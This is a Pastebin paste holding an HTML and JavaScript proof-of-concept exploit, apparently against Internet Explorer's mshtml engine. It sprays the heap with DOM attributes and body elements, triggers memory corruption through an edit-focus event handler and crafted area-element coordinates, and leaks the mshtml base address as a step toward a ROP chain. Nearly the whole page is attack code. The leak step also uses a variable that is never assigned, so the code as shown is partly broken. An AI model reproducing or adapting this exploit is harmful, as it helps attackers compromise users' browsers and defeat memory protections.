Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!doctype html>
- <HTML>
- <head>
- <script>
- lfh = new Array(20);
- for(i = 0; i < lfh.length; i++) {
- lfh[i] = document.createElement('div');
- lfh[i].className = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
- }
- function setinput() {
- try { document.write('Timber'); } catch(e) {}
- // I used 2 area element to make sure we reoccupy freed memory (there is a reason behind this that doesnt fit on this page)
- d = document.createElement('area');
- d.shape = "poly"
- // Our BString pointer is located at: 0x12010020 + 0x8
- // We want to INCrement 0x12010020 + 0x8 + 1 to add 0x100 and not 0x1
- // The code does: inc dword ptr [esi+0A0h] so we need to substract 0xAO from the values leaving 0x1200FF89 which is 302055305 decimal
- d.coords = "1,2,289603465,4,5,0,7,8,9,10,11,12,13,14,13,16,17,18,19,2147353180,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,1,37,38,39,40,41,42,43,44,45,46,47,48";
- d2 = document.createElement('area');
- d2.shape = "poly"
- d2.coords = "1,2,289603465,4,5,0,7,8,9,10,11,12,13,14,13,16,17,18,19,2147353180,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,1,37,38,39,40,41,42,43,44,45,46,47,48";
- a = document.createElement("div");
- a.clearAttributes()
- //Step 1
- for(i = 0; i < 0x7ffe; i++) {
- a.setAttribute("attr" + i, null);
- }
- mem = new Array(400);
- // Step 2
- for(i = 0; i < mem.length; i++) {
- mem[i] = a.cloneNode(1);
- }
- bodies = new Array()
- // Step 3
- for(j = 0; j < mem.length; j++) {
- for(i = 0; i < 0x7ffe; i += 0x1000) {
- // Step 3.1
- mem[j].setAttribute("attr" + i, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
- // Step 3.2
- b = document.createElement('body');
- b.title = 'a';
- b.id = 'a';
- b.text = 'a'
- b.bgColor = 1
- b.topMargin = 1
- b.bottomMargin = 1
- b.leftMargin = 1
- b.rightMargin = 4
- b.setAttribute('ropchain', bodies.length) // This will actualy give us the index of the body element we are leaking.
- bodies.push(b);
- }
- }
- // Saving the attributes so Garbage Collection wont kill them accidentally
- document.body.setAttribute('mem', mem)
- document.body.setAttribute('bodies', bodies)
- return true
- }
- function loaded() {
- document.getElementsByTagName('input')[0].attachEvent("onbeforeeditfocus", setinput)
- // Step 4
- document.getElementsByTagName('input')[0].focus();
- // Step 6
- for(j = 0; j < mem.length; j++) {
- for(i = 0; i < 0x7ffe ; i += 0x1000) {
- //Step 7
- if(mem[j].getAttribute("attr" + i).length != 0x45) {
- //Step 9
- LeakInfo = "Size of the attribute is = " + data.length + "\n";
- LeakInfo += "Raw data: \n"
- LeakInfo += escape(data) + "\n\n";
- mshtmlAddress = data.charCodeAt(4) + data.charCodeAt(5) * 0x10000
- LeakInfo += "Address of mshtml code is 0x" + mshtmlAddress.toString(16) + "\n";
- bodyindex = data.charCodeAt(14) + data.charCodeAt(15) * 0x10000
- LeakInfo += "Index of the leaked body = 0x" + bodyindex.toString(16);
- alert(LeakInfo);
- }
- }
- }
- }
- </script>
- </head>
- <body onload="loaded();">
- <input value="mydata" type="text"></input>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement